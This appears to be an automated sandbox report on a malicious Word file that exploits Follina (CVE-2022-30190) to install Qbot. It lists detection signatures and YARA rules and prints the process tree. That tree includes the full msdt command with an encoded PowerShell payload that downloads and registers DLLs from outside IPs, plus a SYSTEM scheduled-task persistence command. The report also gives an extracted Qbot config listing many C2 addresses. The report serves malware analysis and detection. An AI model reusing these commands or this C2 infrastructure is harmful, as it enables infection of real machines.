Edit tour
Windows
Analysis Report
doc782.docx
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- WINWORD.EXE (PID: 7032 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Office16\ WINWORD.EX E" /Automa tion -Embe dding MD5: 0B9AB9B9C4DE429473D6450D4297A123) - MSOSYNC.EXE (PID: 5960 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - MSOSYNC.EXE (PID: 5160 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - msdt.exe (PID: 2984 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=? IT_ LaunchMeth od=Context Menu IT_Br owseForFil e=$(Invoke -Expressio n($(Invoke -Expressio n('[System .Text.Enco ding]'+[ch ar]58+[cha r]58+'Unic ode.GetStr ing([Syste m.Convert] '+[char]58 +[char]58+ 'FromBase6 4String('+ [char]34+' JABwACAAPQ AgACQARQBu AHYAOgB0AG UAbQBwADsA aQB3AHIAIA BoAHQAdABw ADoALwAvAD EAMAA0AC4A MwA2AC4AMg AyADkALgAx ADMAOQAvAC QAKAByAGEA bgBkAG8AbQ ApAC4AZABh AHQAIAAtAE 8AdQB0AEYA aQBsAGUAIA AkAHAAXAB0 AC4AQQA7AG kAdwByACAA aAB0AHQAcA A6AC8ALwA4 ADUALgAyAD MAOQAuADUA NQAuADIAMg A4AC8AJAAo AHIAYQBuAG QAbwBtACkA LgBkAGEAdA AgAC0ATwB1 AHQARgBpAG wAZQAgACQA cABcAHQAMQ AuAEEAOwBp AHcAcgAgAG gAdAB0AHAA OgAvAC8AMQ A4ADUALgAy ADMANAAuAD IANAA3AC4A MQAxADkALw AkACgAcgBh AG4AZABvAG 0AKQAuAGQA YQB0ACAALQ BPAHUAdABG AGkAbABlAC AAJABwAFwA dAAyAC4AQQ A7AHIAZQBn AHMAdgByAD MAMgAgACQA cABcAHQALg BBADsAcgBl AGcAcwB2AH IAMwAyACAA JABwAFwAdA AxAC4AQQA7 AHIAZQBnAH MAdgByADMA MgAgACQAcA BcAHQAMgAu AEEA'+[cha r]34+'))') )))i/../.. /../../../ ../../../. ./../../.. /../../Win dows/Syste m32/mpsigs tub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 4480 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \asaommz3\ asaommz3.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 1124 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S2969.tmp" "c:\Users \user\AppD ata\Local\ Temp\asaom mz3\CSCAF2 2E0F83F324 7E8BD8B234 DB9985444. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 4384 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \i3ghm531\ i3ghm531.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 4536 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S4732.tmp" "c:\Users \user\AppD ata\Local\ Temp\i3ghm 531\CSCC6D 89D5E8D544 281B069B88 14BE4D14E. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 1320 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t. A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 4384 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- regsvr32.exe (PID: 5688 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t1 .A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 2256 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7) - schtasks.exe (PID: 4456 cmdline:
"C:\Window s\system32 \schtasks. exe" /Crea te /RU "NT AUTHORITY \SYSTEM" / tn swyghew z /tr "reg svr32.exe -s \"C:\Us ers\user\A ppData\Loc al\Temp\t1 .A\"" /SC ONCE /Z /S T 19:54 /E T 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 1548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- regsvr32.exe (PID: 4768 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\t2 .A MD5: 426E7499F6A7346F0410DEAD0805586B) - explorer.exe (PID: 5492 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- csc.exe (PID: 5404 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \01rkp2ka\ 01rkp2ka.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 4496 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S1B1C.tmp" "c:\Users \user\AppD ata\Local\ Temp\01rkp 2ka\CSC332 C869B68444 DFCA3A2C61 AAABD180.T MP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 6036 cmdline:
regsvr32.e xe -s "C:\ Users\user \AppData\L ocal\Temp\ t1.A" MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 3976 cmdline:
-s "C:\Us ers\user\A ppData\Loc al\Temp\t1 .A" MD5: 426E7499F6A7346F0410DEAD0805586B)
- cleanup
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 18 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Click to see the 25 entries |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Timestamp: | 185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628 |
SID: | 2036726 |
Source Port: | 80 |
Destination Port: | 49171 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Malware Configuration Extractor: |